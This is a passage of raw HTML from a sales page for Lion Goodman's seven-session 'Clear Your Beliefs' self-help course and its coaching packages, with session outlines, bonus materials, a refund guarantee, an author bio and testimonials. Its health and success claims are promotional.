programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" 